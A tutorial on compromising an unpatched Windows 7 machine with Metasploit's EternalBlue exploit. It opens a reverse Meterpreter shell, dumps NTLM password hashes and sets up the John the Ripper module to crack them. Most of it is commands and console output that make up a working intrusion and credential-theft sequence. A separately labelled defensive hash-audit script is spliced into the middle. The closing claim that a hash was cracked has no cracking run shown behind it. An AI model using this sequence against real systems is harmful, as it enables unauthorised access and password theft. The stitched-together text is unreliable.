
How To Use John the Ripper in Metasploit to Quickly Crack Windows Hashes


There are many password-cracking tools out there, but one of the mainstays has always been John the Ripper. It's a powerful piece of software that can be configured and used in many different ways.

This article is for educational purposes only!

Metasploit actually contains a little-known module version of JTR that can be used to quickly crack weak passwords, so let's explore it in an attempt to save precious time and effort.


We will be using an unpatched version of Windows 7 as the target, so if you have a copy lying around, feel free to use it. The method of exploitation doesn't matter much here, as long as you can get a Meterpreter session on the target. The John the Ripper module should work on any version of Windows we can grab the hashes from. In this tutorial, we will obtain the hash of an additional user that has logged onto the system (admin2).

Step 1: Compromise the PC


To begin, we will need to compromise the target and get a Meterpreter session. Since we know the target is running an unpatched version of Windows 7, we can use EternalBlue to quickly exploit the system from our Kali box.
We will need Metasploit's built-in database up and running for the John the Ripper module to work later (the hashdump post module and the creds command both store and read from it, so without a database there is nothing for JTR to crack), so start it with the following command. Once msfconsole is up, db_status confirms that it is actually connected.

~# service postgresql start

Then, fire up Metasploit by typing msfconsole in the terminal:

~# msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***

                 (Metasploit ASCII banner)

       To boldly go where no shell has gone before

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

Next, load the EternalBlue exploit module with the use command:

msf5 > use exploit/windows/smb/ms17_010_eternalblue

Set the appropriate options, and type run to launch:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.0.1:1337
[+] 10.10.0.104:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.0.104:445 - Connecting to target for exploitation.
[+] 10.10.0.104:445 - Connection established for exploitation.
[+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.104:445 - Starting non-paged pool grooming
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.104:445 - Sending final SMBv2 buffers.
[*] 10.10.0.104:445 - Sending last fragment of exploit packet!
[*] 10.10.0.104:445 - Receiving response from exploit packet
[+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.104:445 - Sending egg to corrupted connection.
[*] 10.10.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1337 -> 10.10.0.104:49212) at 2019-06-27 11:56:09 -0500
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >


Step 2: Grab Some Hashes

The next thing we need to do is obtain the hashes of any users on the system. Meterpreter has an awesome feature called hashdump that will automatically dump the hashes for us:

meterpreter > hashdump
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Unfortunately, all this does is display them on-screen. We need to save these to the database so the JTR module can work its magic. First, background the current session:

meterpreter > background
[*] Backgrounding session 1...

Then, we can use the hashdump post module to grab the hashes from our target. Load it with the use command:

msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/hashdump


Metasploit post modules work by running on an existing session, which is why we need to background the session in the first place. We can type options to display the settings for the module:

msf5 post(windows/gather/hashdump) > options

Module options (post/windows/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


All we need to do is specify the session number we want to run this on. Use the set command to set the session to 1 (or whatever session number that is running in the background):

msf5 post(windows/gather/hashdump) > set session 1
session => 1

Now, simply type run and the module will gather the hashes:

msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 1c8cfe9e1146578ee29d759b84a0ab70...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

admin2:"shots"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::

[*] Post module execution completed


We can see that we got the same hashes as before, but we also found a password hint for admin2. Nice. Now if we type creds at the prompt, Metasploit will display all the credentials that are currently stored in the database:

msf5 post(windows/gather/hashdump) > creds
Credentials
===========

host         origin       service        public         private                                                            realm  private_type  JtR Format
----         ------       -------        ------         -------                                                            -----  ------------  ----------
10.10.0.104  10.10.0.104  445/tcp (smb)  guest          aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
10.10.0.104  10.10.0.104  445/tcp (smb)  administrator  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0         NTLM hash     nt,lm
10.10.0.104  10.10.0.104  445/tcp (smb)  admin2         aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7         NTLM hash     nt,lm

This shows us the host, service, and associated credentials, as well as the hash type.
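The hashdump lines above follow the user:RID:LM:NT::: layout, and two values in them are worth recognising on sight: aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password (LM hashing disabled), and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. The following audit script is an added example, not part of the original article or of Metasploit; it parses dump lines in this format and reports what a defender reviewing such a dump would triage first: empty-password accounts, accounts that still store a real LM hash, and accounts sharing one NT hash (the svc_backup line and its LM value are constructed for the example).

```python
# Added example (not from the original article or Metasploit): audit
# hashdump/pwdump-style lines for weak-credential hygiene findings.

# Well-known constants: LM and NT hashes of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample: the three lines the article shows, plus one made-up
# account that stores a real LM hash and reuses admin2's NT hash.
SAMPLE_HASHDUMP = """\
admin2:1000:aad3b435b51404eeaad3b435b51404ee:7178d3046e7ccfac0469f95588b6bdf7:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:7178d3046e7ccfac0469f95588b6bdf7:::
"""


def parse_hashdump(text):
    """Parse user:rid:lm:nt::: lines into dicts, skipping malformed ones."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # blank line or not in pwdump layout
        records.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records


def audit_hashdump(text):
    """Return the findings a defender would triage from a hash dump."""
    records = parse_hashdump(text)
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_nt": {}}
    by_nt = {}
    for r in records:
        # Empty NT hash: blank password (often a disabled built-in account).
        if r["nt"] == EMPTY_NT:
            findings["blank_password"].append(r["user"])
        # A non-empty LM hash means LM storage is still enabled for this user.
        if r["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(r["user"])
        by_nt.setdefault(r["nt"], []).append(r["user"])
    # Identical NT hashes mean identical passwords (NT has no salt).
    findings["shared_nt"] = {h: users for h, users in by_nt.items()
                             if len(users) > 1 and h != EMPTY_NT}
    return findings


if __name__ == "__main__":
    for key, value in audit_hashdump(SAMPLE_HASHDUMP).items():
        print(f"{key}: {value}")
```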

Now all that's left to do is crack that hash.

Step 3: Crack the Hash

Metasploit's John the Ripper module is extremely useful when you need to crack hashes quickly, without having to load John externally. It is also worth trying as a first pass, since it usually takes very little time and can uncover weak passwords.
Now that we have our hashes stored in the database, load the JTR module with the use command:

msf5 post(windows/gather/hashdump) > use auxiliary/analyze/jtr_windows_fast

We can take a look at the available options for this module:

msf5 auxiliary(analyze/jtr_windows_fast) > options

Module options (auxiliary/analyze/jtr_windows_fast):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   CONFIG                                 no        The path to a John config file to use instead of the default
   CUSTOM_WORDLIST                        no        The path to an optional custom wordlist
   ITERATION_TIMEOUT                      no        The max-run-time for each iteration of cracking
   JOHN_PATH                              no        The absolute path to the John the Ripper executable
   KORELOGIC             false            no        Apply the KoreLogic rules to Wordlist Mode (slower)
   MUTATE                false            no        Apply common mutations to the Wordlist (SLOW)
   POT                                    no        The path to a John POT file to use instead of the default
   USE_CREDS             true             no        Use existing credential data saved in the database
   USE_DB_INFO           true             no        Use looted database schema info to seed the wordlist
   USE_DEFAULT_WORDLIST  true             no        Use the default Metasploit wordlist
   USE_HOSTNAMES         true             no        Seed the wordlist with hostnames from the workspace
   USE_ROOT_WORDS        true             no        Use the Common Root Words Wordlist


In this tutorial, we learned about Metasploit's John the Ripper module and how to use it to quickly crack Windows hashes. We first exploited the target using EternalBlue and used the hashdump post module to grab user hashes and store them in the database. Then, we ran the JTR module right in Metasploit and cracked the hash of one of the users. Metasploit's JTR module makes it easy to obtain weak passwords in very little time, and it is worth a shot in any Windows post-exploitation campaign.
